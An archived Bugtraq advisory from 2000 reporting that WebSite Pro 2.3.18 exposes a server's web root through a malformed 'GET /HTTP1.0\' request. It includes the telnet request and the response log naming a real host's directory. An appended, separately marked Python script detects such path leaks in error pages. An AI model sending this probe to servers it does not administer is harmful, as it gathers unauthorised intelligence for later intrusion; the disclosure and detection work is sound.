WebSitePro/2.3.18 is revealing Webdirectories

From: Lark Lizerman (webmasterat_private)
Date: Wed Jan 12 2000 - 19:35:25 PST


    Dear Bugtraqers,
    
    Description:
    
    WebSite Pro is also revealing the webdirectory of each Website by a simple command line.
    This bug is similar to the "IIS revealing webdirectories" bug reported on bugtraq.
    On WebSitePro the difference is the way you retrieve the path.
    
    
    Example:
    
    (Made with MS Windows Telnet Client)
    
    
    Logfile:
    
    ----------------------------------start----------------------------------
    GET /HTTP1.0\    <------ Our command we send via Telnet on port 80 to the webserver
    
    
    Response:
    
    Content-length: 186

    <HTML><HEAD><TITLE>Document Moved</TITLE></HEAD>
                                                    <BODY bgcolor="White"><H2>Docume
    nt Moved</H2>
                 This document has moved <A HREF="http://www.akte.net/HTTP1.0/">here
    </A>.<P>
            </BODY></HTML>
    GET /HTTP1.0/
    Content-length: 230

    <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
                                                   <BODY bgcolor="White"><H2>404 Not
     Found</H2>
               The requested URL was not found on this server:<P><CODE>/HTTP1.0/<P>(
    D:\WEBROOTS\VHOSTS\aktenet\htdocs\HTTP1.0)</CODE><P>
                                                        </BODY></HTML>
    
    
    -----------------------------------end-----------------------------------
    
    
    Here it shows us that the HTML files are in D:\WEBROOTS\VHOSTS\aktenet\htdocs.
    It's not a large threat, but an attacker might gain information about the server which should stay
    in Admin's hands. On all Webservers e.g. MS IIS and Apache the response is "error 404".
    
    -------cut------
    Elias: I have some html in this mail, try to send it as clear text, as it is, please.
    Else people with html capable browsers will only get half of the logfile.
    Thx :-)
    ------cut------
    -------------------------------
    Lark Lizerman
    
    lizermanat_private
    -------------------------------
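
Added example (not part of the original post): a Python check that an administrator can run over captured error-page bodies from their own server to flag the kind of filesystem path disclosure shown in the log above. The first sample body is the 404 from the post; the second body, the function names and the UNC-path case are assumptions added for illustration.

```python
import html
import re

TAG = re.compile(r"<[^>]+>")
# One path segment: stops at whitespace and at characters Windows forbids in names.
SEG = r"[^\\/:*?\"<>|\s]+"
# Drive-letter path (D:\dir\file) or UNC path (\\host\share); UNC is an added case.
WIN_PATH = re.compile(rf"(?<![A-Za-z0-9])(?:[A-Za-z]:|\\\\{SEG})(?:\\{SEG})+")

def find_path_leaks(body):
    """Return the distinct Windows filesystem paths visible in a response body."""
    text = html.unescape(TAG.sub(" ", body))   # drop markup, decode &lt; etc.
    leaks = []
    for match in WIN_PATH.finditer(text):
        path = match.group(0).rstrip(").,;'")  # trailing punctuation is not path
        if path not in leaks:
            leaks.append(path)
    return leaks

def exposed_root(leak, url_path):
    """Strip the requested URL path from the leaked path, as the post does by hand."""
    suffix = url_path.strip("/").replace("/", "\\")
    if suffix and leak.lower().endswith("\\" + suffix.lower()):
        return leak[: -len(suffix) - 1]
    return leak

def audit(responses):
    """Map each (url_path, body) pair that leaks a path to [(leak, root), ...]."""
    report = {}
    for url_path, body in responses:
        leaks = find_path_leaks(body)
        if leaks:
            report[url_path] = [(p, exposed_root(p, url_path)) for p in leaks]
    return report

# First body: the 404 quoted in the post. Second body: constructed clean 404.
CAPTURED = [
    ("/HTTP1.0/", r"""<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY bgcolor="White"><H2>404 Not Found</H2>
The requested URL was not found on this server:<P><CODE>/HTTP1.0/<P>(
D:\WEBROOTS\VHOSTS\aktenet\htdocs\HTTP1.0)</CODE><P>
</BODY></HTML>"""),
    ("/missing.html", "<HTML><BODY><H2>404 Not Found</H2></BODY></HTML>"),
]

if __name__ == "__main__":
    print(audit(CAPTURED))
```

A non-empty report for a server's own error pages means the error template should be replaced with one that echoes at most the requested URL.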
    
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:27:54 PDT